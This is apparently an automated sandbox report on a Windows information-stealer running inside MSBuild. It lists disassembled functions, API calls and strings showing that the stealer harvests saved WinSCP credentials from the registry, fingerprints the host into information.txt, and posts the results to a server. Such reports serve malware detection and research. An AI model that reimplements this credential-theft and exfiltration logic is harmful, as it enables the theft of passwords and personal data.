lstrlenA.KERNEL32(?,",status,00437990,------,00437984,",task_id,00437970,------,00437964,",mode,00437950,------,00437944), ref: 0040753C
lstrlenA.KERNEL32(?), ref: 0040754B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
HeapAlloc.KERNEL32(00000000), ref: 0040755D
lstrlenA.KERNEL32(?), ref: 0040756A
_memmove.LIBCMT ref: 00407578
lstrlenA.KERNEL32(?), ref: 00407586
lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
_memmove.LIBCMT ref: 004075A1
lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
InternetCloseHandle.WININET(00000000), ref: 0040762C
InternetCloseHandle.WININET(?), ref: 00407638
InternetCloseHandle.WININET(?), ref: 00407644
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Strings

------, xrefs: 00407145
------, xrefs: 004073FF
------, xrefs: 0040729F
task_id, xrefs: 00407351
", xrefs: 0040721D
status, xrefs: 004074B1
", xrefs: 0040737D
------, xrefs: 00406FE3
", xrefs: 004070C1
mode, xrefs: 004071F1
------, xrefs: 00406E82
", xrefs: 004074DD
8ecc9c7eaebfdf2a8cc0586d7419d6ea, xrefs: 004070ED
", xrefs: 00406F61
------, xrefs: 00406CFC
build_id, xrefs: 00407095

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$"$"$------$------$------$------$------$------$8ecc9c7eaebfdf2a8cc0586d7419d6ea$build_id$mode$status$task_id
API String ID: 3702379033-3909127493
Opcode ID: b9c1955646b138a56f520bdf348497aa3760e7fbf47a1c04a9d2ad00bc85f41b
Instruction ID: 4b0fddad23b3ceb2e745eed4edf179f531a78337ddaa15e28fb3aa872155333d
Opcode Fuzzy Hash: b9c1955646b138a56f520bdf348497aa3760e7fbf47a1c04a9d2ad00bc85f41b
Instruction Fuzzy Hash: 0B529271A001699BCF61EB61CD46BCCB775AF04748F0184E7A60D73162DAB86FCA8F58

Function 0040E15B Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040E18C
_memset.LIBCMT ref: 0040E1AC
_memset.LIBCMT ref: 0040E1BD
_memset.LIBCMT ref: 0040E1CE
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E202
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E233
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E24B
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E272
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E292
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2B5
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368D7), ref: 0040E34E
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3AE

Strings

Password: , xrefs: 0040E4FE
Password, xrefs: 0040E4EA
Security, xrefs: 0040E228
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E1E0
UserName, xrefs: 0040E46B
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E288
Login: , xrefs: 0040E42E
Soft: WinSCP, xrefs: 0040E2D3
Host: , xrefs: 0040E2FF
PortNumber, xrefs: 0040E392
HostName, xrefs: 0040E33C
:22, xrefs: 0040E402
passwords.txt, xrefs: 0040E637
UseMasterPassword, xrefs: 0040E223

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memset$Value$CloseOpen$Enum
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 463713726-2798830873
Opcode ID: 9a18c689fb21a39029da13a8c8068ff4cd1a0520cfdcc8c31b4f6a29730dd9de
Instruction ID: 6d6a57d378e1588f3ec60a29e8942986b626aa772639c56a91c031b0f7d346e0
Opcode Fuzzy Hash: 9a18c689fb21a39029da13a8c8068ff4cd1a0520cfdcc8c31b4f6a29730dd9de
Instruction Fuzzy Hash: 92D105B191012DABDB20EB91DC82BD9B779AF04348F5054EBA508B3091DAB47FC9CF65

Function 00405F39 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 466
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
StrCmpCA.SHLWAPI(?), ref: 00405FF6
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
lstrlenA.KERNEL32(?,",mode,004378D0,------,004378C4,8ecc9c7eaebfdf2a8cc0586d7419d6ea,",build_id,004378AC,------,004378A0,",00437894,------), ref: 004065FD
lstrlenA.KERNEL32(?), ref: 0040660C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
HeapAlloc.KERNEL32(00000000), ref: 0040661E
lstrlenA.KERNEL32(?), ref: 0040662B
_memmove.LIBCMT ref: 00406639
lstrlenA.KERNEL32(?), ref: 00406647
lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
_memmove.LIBCMT ref: 00406662
lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
InternetCloseHandle.WININET(00000000), ref: 004066ED
InternetCloseHandle.WININET(?), ref: 004066F9
InternetCloseHandle.WININET(?), ref: 00406705
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Strings

", xrefs: 00406445
------, xrefs: 00406206
8ecc9c7eaebfdf2a8cc0586d7419d6ea, xrefs: 00406471
------, xrefs: 004064C9
", xrefs: 004065A1
", xrefs: 004062E5
mode, xrefs: 00406575
build_id, xrefs: 00406419
------, xrefs: 00406367
------, xrefs: 00406080
"yA, xrefs: 004067D8

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$"yA$------$------$------$------$8ecc9c7eaebfdf2a8cc0586d7419d6ea$build_id$mode
API String ID: 3702379033-2064787231
Opcode ID: b9e6a25d9bf2b2f3ca19f67cccbb907a00b476f3120e9f86b5629d953a9ab4a2
Instruction ID: 9e441524b674e8c4d1f55b2c9efffc7332bfc37f13668675a8e156f306295e1d
Opcode Fuzzy Hash: b9e6a25d9bf2b2f3ca19f67cccbb907a00b476f3120e9f86b5629d953a9ab4a2
Instruction Fuzzy Hash: C822A5719001699BCF21EB61CD46BCDB775AF08748F0184E7A64D73162CAB86FCA8F58

Function 00413BC6 Relevance: 49.7, APIs: 2, Strings: 26, Instructions: 674
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

Part of subcall function 00410C95: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CAD
Part of subcall function 00410C95: HeapAlloc.KERNEL32(00000000), ref: 00410CB4
Part of subcall function 00410C95: GetLocalTime.KERNEL32(?), ref: 00410CC0
Part of subcall function 00410C95: wsprintfA.USER32 ref: 00410CEB

Part of subcall function 004115A9: _memset.LIBCMT ref: 004115DC
Part of subcall function 004115A9: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 004115FB
Part of subcall function 004115A9: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00411620
Part of subcall function 004115A9: RegCloseKey.ADVAPI32(?,?,?,?), ref: 0041162C
Part of subcall function 004115A9: CharToOemA.USER32(?,?), ref: 00411640

Part of subcall function 00411659: GetCurrentHwProfileA.ADVAPI32(?), ref: 00411674
Part of subcall function 00411659: _memset.LIBCMT ref: 004116A3
Part of subcall function 00411659: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116CB
Part of subcall function 00411659: lstrcatA.KERNEL32(?,00436ED4,?,?,?,?,?), ref: 004116E8

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Part of subcall function 00410977: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109AA
Part of subcall function 00410977: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004109EA
Part of subcall function 00410977: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A3F
Part of subcall function 00410977: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A46

GetCurrentProcessId.KERNEL32(Path: ,00436884,HWID: ,00436878,GUID: ,0043686C,00000000,MachineID: ,0043685C,00000000,Date: ,00436850,0043684C,11.1,Version: ,004365B6), ref: 00413E1B

Part of subcall function 0041221F: OpenProcess.KERNEL32(00000410,00000000,*>A,00000000,?), ref: 00412241
Part of subcall function 0041221F: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041225C
Part of subcall function 0041221F: CloseHandle.KERNEL32(00000000), ref: 00412263

Part of subcall function 00410B05: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B19
Part of subcall function 00410B05: HeapAlloc.KERNEL32(00000000,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B20

Part of subcall function 004117DC: __EH_prolog3_catch_GS.LIBCMT ref: 004117E3
Part of subcall function 004117DC: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413F39,Install Date: ,004368B8,00000000,Windows: ,004368A8,Work Dir: In memory,00436890), ref: 004117F4
Part of subcall function 004117DC: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411805
Part of subcall function 004117DC: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041181F
Part of subcall function 004117DC: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411855
Part of subcall function 004117DC: VariantInit.OLEAUT32(?), ref: 004118B0

Part of subcall function 0041196C: __EH_prolog3_catch.LIBCMT ref: 00411973
Part of subcall function 0041196C: CoInitializeEx.OLE32(00000000,00000000,00000030,00413FA7,?,AV: ,004368CC,Install Date: ,004368B8,00000000,Windows: ,004368A8,Work Dir: In memory,00436890), ref: 00411982
Part of subcall function 0041196C: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411993
Part of subcall function 0041196C: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119AD
Part of subcall function 0041196C: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004119E3
Part of subcall function 0041196C: VariantInit.OLEAUT32(?), ref: 00411A32

Part of subcall function 00410C5A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C66
Part of subcall function 00410C5A: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C6D
Part of subcall function 00410C5A: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410C81

Part of subcall function 00410C28: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C34
Part of subcall function 00410C28: RtlAllocateHeap.NTDLL(00000000,?,?,?,004013B9), ref: 00410C3B
Part of subcall function 00410C28: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C4F

Part of subcall function 00411538: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0041154A
Part of subcall function 00411538: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411555
Part of subcall function 00411538: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00411560
Part of subcall function 00411538: ReleaseDC.USER32(00000000,00000000), ref: 0041156B
Part of subcall function 00411538: GetProcessHeap.KERNEL32(00000000,00000104,?,?,004140D8,?,Display Resolution: ,004368FC,00000000,User Name: ,004368EC,00000000,Computer Name: ,004368D8,AV: ,004368CC), ref: 00411577
Part of subcall function 00411538: HeapAlloc.KERNEL32(00000000,?,?,004140D8,?,Display Resolution: ,004368FC,00000000,User Name: ,004368EC,00000000,Computer Name: ,004368D8,AV: ,004368CC,Install Date: ), ref: 0041157E
Part of subcall function 00411538: wsprintfA.USER32 ref: 00411590

Part of subcall function 00410DB0: GetKeyboardLayoutList.USER32(00000000,00000000,0043670A,?,?), ref: 00410DE1
Part of subcall function 00410DB0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410DEF
Part of subcall function 00410DB0: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410DFD
Part of subcall function 00410DB0: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E2C
Part of subcall function 00410DB0: LocalFree.KERNEL32(00000000), ref: 00410ED4

Part of subcall function 00410D03: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D1E
Part of subcall function 00410D03: HeapAlloc.KERNEL32(00000000), ref: 00410D25
Part of subcall function 00410D03: GetTimeZoneInformation.KERNEL32(?), ref: 00410D34
Part of subcall function 00410D03: wsprintfA.USER32 ref: 00410D52

Part of subcall function 00410F26: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934), ref: 00410F3A
Part of subcall function 00410F26: HeapAlloc.KERNEL32(00000000,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934,Keyboard Languages: ,00436918), ref: 00410F41
Part of subcall function 00410F26: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436890,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ), ref: 00410F5F
Part of subcall function 00410F26: RegQueryValueExA.KERNEL32(00436890,00000000,00000000,00000000,000000FF,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000), ref: 00410F7B
Part of subcall function 00410F26: RegCloseKey.ADVAPI32(00436890,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934,Keyboard Languages: ,00436918), ref: 00410F84

Part of subcall function 00410FDC: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 00411052
Part of subcall function 00410FDC: wsprintfA.USER32 ref: 004110B0

Part of subcall function 00410F8F: GetSystemInfo.KERNEL32(?), ref: 00410FA9
Part of subcall function 00410F8F: wsprintfA.USER32 ref: 00410FC1

Part of subcall function 004110EE: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436918,Display Resolution: ,004368FC,00000000,User Name: ,004368EC,00000000,Computer Name: ,004368D8,AV: ,004368CC,Install Date: ), ref: 00411106
Part of subcall function 004110EE: HeapAlloc.KERNEL32(00000000), ref: 0041110D
Part of subcall function 004110EE: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411129
Part of subcall function 004110EE: wsprintfA.USER32 ref: 0041114F

Part of subcall function 00411167: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111BE

Part of subcall function 0041147A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0043670F,?,?), ref: 004114A9
Part of subcall function 0041147A: Process32First.KERNEL32(00000000,00000128), ref: 004114B9
Part of subcall function 0041147A: Process32Next.KERNEL32(00000000,00000128), ref: 00411517
Part of subcall function 0041147A: CloseHandle.KERNEL32(00000000), ref: 00411522

Part of subcall function 004111D8: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670E,00000000,?,?), ref: 00411248
Part of subcall function 004111D8: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00411285
Part of subcall function 004111D8: wsprintfA.USER32 ref: 004112B2
Part of subcall function 004111D8: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112D1
Part of subcall function 004111D8: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411307
Part of subcall function 004111D8: lstrlenA.KERNEL32(?), ref: 0041131C

Part of subcall function 004111D8: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E94), ref: 004113B1
Part of subcall function 004111D8: RegCloseKey.ADVAPI32(?), ref: 0041141B
Part of subcall function 004111D8: RegCloseKey.ADVAPI32(?), ref: 00411447

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436918,Display Resolution: ,004368FC,00000000,User Name: ,004368EC,00000000), ref: 004145A3

Part of subcall function 00417023: CreateThread.KERNEL32(00000000,00000000,00416F52,?,00000000,00000000), ref: 004170C2
Part of subcall function 00417023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 004170CA

Strings

TimeZone: , xrefs: 004141EC
GUID: , xrefs: 00413D21
HWID: , xrefs: 00413D8E
[Hardware], xrefs: 0041424D
Keyboard Languages: , xrefs: 0041411E
Computer Name: , xrefs: 00413FED
Cores: , xrefs: 004142CE
information.txt, xrefs: 004145B3
Processor: , xrefs: 0041426D
Windows: , xrefs: 00413EB0
RAM: , xrefs: 00414390
Date: , xrefs: 00413C5F
MachineID: , xrefs: 00413CC0
Local Time: , xrefs: 0041418B
Path: , xrefs: 00413DFB
Threads: , xrefs: 0041432F
User Name: , xrefs: 0041404E
Install Date: , xrefs: 00413F11
Display Resolution: , xrefs: 004140AF
11.1, xrefs: 00413BFF
Work Dir: In memory, xrefs: 00413E70
[Software], xrefs: 004144E3
Version: , xrefs: 00413BDF
[Processes], xrefs: 0041446A
VideoCard: , xrefs: 004143F7
AV: , xrefs: 00413F7E

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
String ID: 11.1$AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 3634126619-3666103263
Opcode ID: 0ca69ee708f7a4405009bdefc3c3dcdb5552b6acb5a2487c1b93f6dde74c051f
Instruction ID: ebe56e845d6c527f880e10713f64c5926fb5ad5a73effd773645c7a8815a02d5
Opcode Fuzzy Hash: 0ca69ee708f7a4405009bdefc3c3dcdb5552b6acb5a2487c1b93f6dde74c051f
Instruction Fuzzy Hash: DA526971D0001EABCF01FBA1DD429CDB775AF04748F51816AA611771A2DBB87ECA8F98

Function 004187CF Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00418810
GetProcAddress.KERNEL32 ref: 00418827
GetProcAddress.KERNEL32 ref: 0041883E
GetProcAddress.KERNEL32 ref: 00418855
GetProcAddress.KERNEL32 ref: 0041886C
GetProcAddress.KERNEL32 ref: 00418883
GetProcAddress.KERNEL32 ref: 0041889A
GetProcAddress.KERNEL32 ref: 004188B1
GetProcAddress.KERNEL32 ref: 004188C8
GetProcAddress.KERNEL32 ref: 004188DF
GetProcAddress.KERNEL32 ref: 004188F6
GetProcAddress.KERNEL32 ref: 0041890D
GetProcAddress.KERNEL32 ref: 00418924
GetProcAddress.KERNEL32 ref: 0041893B
GetProcAddress.KERNEL32 ref: 00418952
GetProcAddress.KERNEL32 ref: 00418969
GetProcAddress.KERNEL32 ref: 00418980
GetProcAddress.KERNEL32 ref: 00418997
GetProcAddress.KERNEL32 ref: 004189AE
GetProcAddress.KERNEL32 ref: 004189C5
LoadLibraryA.KERNEL32(?,0041864E), ref: 004189D6
LoadLibraryA.KERNEL32(?,0041864E), ref: 004189E7
LoadLibraryA.KERNEL32(?,0041864E), ref: 004189F8
LoadLibraryA.KERNEL32(?,0041864E), ref: 00418A09
LoadLibraryA.KERNEL32(?,0041864E), ref: 00418A1A
GetProcAddress.KERNEL32(75070000,0041864E), ref: 00418A36
GetProcAddress.KERNEL32(75FD0000,0041864E), ref: 00418A51
GetProcAddress.KERNEL32 ref: 00418A68
GetProcAddress.KERNEL32(75A50000,0041864E), ref: 00418A83
GetProcAddress.KERNEL32(74E50000,0041864E), ref: 00418A9E
GetProcAddress.KERNEL32(76E80000,0041864E), ref: 00418AB9
GetProcAddress.KERNEL32 ref: 00418AD0

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
